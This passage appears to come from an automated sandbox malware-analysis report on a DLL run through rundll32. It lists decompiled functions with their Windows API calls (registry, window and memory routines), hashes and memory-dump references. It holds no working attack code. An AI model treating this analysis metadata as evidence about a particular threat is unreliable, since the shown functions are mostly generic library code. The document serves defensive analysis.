                                                                                                          • Instruction ID: f848ae84a4977e1a31b52bc52376e27e10e8709ed1b3efe9ee7841c93cdd6a05
                                                                                                          • Opcode Fuzzy Hash: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
                                                                                                          • Instruction Fuzzy Hash: 1431C134600B119FC715DF78E888A6AB7F5FF48350B92056DE58997691DB70E800CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002245E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10022468
                                                                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1002254E
                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002256B
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002258B
                                                                                                          • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100225A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                                                                                                          • String ID: Software\
                                                                                                          • API String ID: 1666054129-964853688
                                                                                                          • Opcode ID: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
                                                                                                          • Instruction ID: 3764a028f082780bf1b34d3e1a3aecc110f1b9c57831791e493d608046546682
                                                                                                          • Opcode Fuzzy Hash: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
                                                                                                          • Instruction Fuzzy Hash: 3C41AC35800128EBCB22DBA0CC81AEEB3B8FF49310F5045D9F249E2191DB34AB958F94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100222E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 100222EA
                                                                                                          • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10022378
                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002239B
                                                                                                            • Part of subcall function 1002228B: __EH_prolog3.LIBCMT ref: 10022292
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                                                                                                          • String ID: Software\Classes\
                                                                                                          • API String ID: 3518408925-1121929649
                                                                                                          • Opcode ID: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
                                                                                                          • Instruction ID: 704202dc6e21b2fa8b48efa6eea704b7fc6a1643c8ca87a9ade3220d51c06aab
                                                                                                          • Opcode Fuzzy Hash: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
                                                                                                          • Instruction Fuzzy Hash: A1317C36C00068EBDB22EBA4CD44BDDB6B8FB09350F5141D5F999A3252DA306FA49F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B26C, Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCapture.USER32 ref: 1002B279
                                                                                                          • SendMessageA.USER32(?,00000365,00000000,00000000), ref: 1002B294
                                                                                                          • GetFocus.USER32 ref: 1002B2A9
                                                                                                          • SendMessageA.USER32(?,00000365,00000000,00000000), ref: 1002B2B7
                                                                                                          • GetLastActivePopup.USER32(?), ref: 1002B2E0
                                                                                                          • SendMessageA.USER32(?,00000365,00000000,00000000), ref: 1002B2ED
                                                                                                            • Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
                                                                                                            • Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852
                                                                                                          • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 1002B313
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3338174999-0
                                                                                                          • Opcode ID: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
                                                                                                          • Instruction ID: 3a08670cfc868389e080b955865bcb0f045f405a5b874c30a2897e43bb08e3ed
                                                                                                          • Opcode Fuzzy Hash: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
                                                                                                          • Instruction Fuzzy Hash: 7F1146B590065AFFEB11DFA1DD8AC9E7E7CEF41788B910075F504A2121EB719F04AB20
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002AAF8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1002AB28
                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB4B
                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB67
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AB77
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AB81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreate$Open
                                                                                                          • String ID: software
                                                                                                          • API String ID: 1740278721-2010147023
                                                                                                          • Opcode ID: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
                                                                                                          • Instruction ID: fb36ca9c2f952ecb3db15ddf6cda8d32fba402c4719dfc4725c3bd37d29a496b
                                                                                                          • Opcode Fuzzy Hash: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
                                                                                                          • Instruction Fuzzy Hash: 6B11E672900158FBDB11DB9ADD88CDFBFBDEB8A750B5000AAF504A2122D7319E44DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B00C, Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002B013
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1002B01D
                                                                                                            • Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F
                                                                                                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002B034
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
                                                                                                            • Part of subcall function 10023B23: __CxxThrowException@8.LIBCMT ref: 10023B39
                                                                                                          • _memset.LIBCMT ref: 1002B060
                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 356813703-0
                                                                                                          • Opcode ID: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
                                                                                                          • Instruction ID: 36d3102e2cb30bc4552268f57227952f3745dc8c02fd82b3b9104c669509b869
                                                                                                          • Opcode Fuzzy Hash: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
                                                                                                          • Instruction Fuzzy Hash: DC115E74100605AFD725EF64DCC5D2BBBB9FF453107A0C529F969D6522CB30AC24CB94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A948, Relevance: 10.5, APIs: 7, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(0000000F), ref: 1002A956
                                                                                                          • GetSysColor.USER32(00000010), ref: 1002A95D
                                                                                                          • GetSysColor.USER32(00000014), ref: 1002A964
                                                                                                          • GetSysColor.USER32(00000012), ref: 1002A96B
                                                                                                          • GetSysColor.USER32(00000006), ref: 1002A972
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 1002A97F
                                                                                                          • GetSysColorBrush.USER32(00000006), ref: 1002A986
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Brush
                                                                                                          • String ID:
                                                                                                          • API String ID: 2798902688-0
                                                                                                          • Opcode ID: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
                                                                                                          • Instruction ID: 2de359d209fd3f7b37bcce9053ec3ec9da3e309d31870537ed148616a4e248d0
                                                                                                          • Opcode Fuzzy Hash: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
                                                                                                          • Instruction Fuzzy Hash: 0BF0FE719407445BD730BF724E49B47BAD1FFC4710F02092EE2458B990D6B6E441DF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10023266, Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002326D
                                                                                                          • GlobalLock.KERNEL32 ref: 10023345
                                                                                                          • CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
                                                                                                          • DestroyWindow.USER32(00000000,?,1000150C,00000000,A72075DA), ref: 100233EE
                                                                                                          • GlobalUnlock.KERNEL32(?,?,1000150C,00000000,A72075DA), ref: 100233FE
                                                                                                          • GlobalFree.KERNEL32 ref: 10023407
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3003189058-0
                                                                                                          • Opcode ID: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
                                                                                                          • Instruction ID: 542586d5134ef99c8f61472b69a72313b72e87743f096b2e8f632b75dff3f323
                                                                                                          • Opcode Fuzzy Hash: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
                                                                                                          • Instruction Fuzzy Hash: DD519B31A0024AEFCB04DFA4E9859AEBBB5EF04350F95442DF506E7292CB70AA45CB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10021E9F, Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowLongA.USER32 ref: 10021ED2
                                                                                                          • GetParent.USER32(00000000), ref: 10021EE0
                                                                                                          • GetParent.USER32(00000000), ref: 10021EF3
                                                                                                          • GetLastActivePopup.USER32(00000000), ref: 10021F04
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 10021F18
                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 10021F2B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                          • String ID:
                                                                                                          • API String ID: 670545878-0
                                                                                                          • Opcode ID: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
                                                                                                          • Instruction ID: f929a2de190b898985c8684475384bdcb1a7d6cc0d17529594567964d95cf4f5
                                                                                                          • Opcode Fuzzy Hash: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
                                                                                                          • Instruction Fuzzy Hash: 7711E73B5012725BDBA2DA65AD80BDF32D8EFB5AE1F830165EC24E7204D730CD0142D5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10037738, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CreateFrameInfo.LIBCMT ref: 10037760
                                                                                                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
                                                                                                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C
                                                                                                          • __getptd.LIBCMT ref: 1003776A
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 10037778
                                                                                                          • __getptd.LIBCMT ref: 10037786
                                                                                                          • __getptd.LIBCMT ref: 10037791
                                                                                                          • _CallCatchBlock2.LIBCMT ref: 100377B7
                                                                                                            • Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521
                                                                                                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
                                                                                                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1602911419-0
                                                                                                          • Opcode ID: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
                                                                                                          • Instruction ID: fb1f34f9027f5a0fd6fb665b034cbc12c1ee6665b85233a2d450c333db5c1a8f
                                                                                                          • Opcode Fuzzy Hash: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
                                                                                                          • Instruction Fuzzy Hash: 4F1104B9C04249EFDB01DFA4D945AEE7BB1FF08315F508469F814AB251DB38AA11DF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A8D2, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1315500227-0
                                                                                                          • Opcode ID: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
                                                                                                          • Instruction ID: abcb09268cf445b2c35b0e2b56c0cfd5e9caec1888beec0722017402bcd9ce52
                                                                                                          • Opcode Fuzzy Hash: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
                                                                                                          • Instruction Fuzzy Hash: FC018F32500126BBEB219F559D48EAF3BACFF463A1F414165FD15D6060DB30DA829A98
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10029F40, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset
                                                                                                          • String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
                                                                                                          • API String ID: 2102423945-455206835
                                                                                                          • Opcode ID: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
                                                                                                          • Instruction ID: fa70bd333b2ddaae6f39455d5bc8e436e1dc58d3be4ecb045c2565641b92f197
                                                                                                          • Opcode Fuzzy Hash: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
                                                                                                          • Instruction Fuzzy Hash: BD914175C00219ABDB80CFA4D581BDEBBF9EF48384F518065F908E7181EB749B84DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10020982, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetMenuCheckMarkDimensions.USER32 ref: 1002099A
                                                                                                          • _memset.LIBCMT ref: 10020A12
                                                                                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10020A75
                                                                                                          • LoadBitmapA.USER32 ref: 10020A8D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4271682439-3916222277
                                                                                                          • Opcode ID: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
                                                                                                          • Instruction ID: 8ec26202c106691d72478eed222520a6e30d1cb825b7d1c94e22465ec1c68f9d
                                                                                                          • Opcode Fuzzy Hash: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
                                                                                                          • Instruction Fuzzy Hash: BD312772A003669FFB10CF289CC5B9D7BB5FB44340F9540AAF549EB182DA709E848B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10025110, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
                                                                                                          • GetSystemMetrics.USER32 ref: 10025168
                                                                                                          • GetSystemMetrics.USER32 ref: 1002516F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$Metrics$InfoParameters
                                                                                                          • String ID: B$DISPLAY
                                                                                                          • API String ID: 3136151823-3316187204
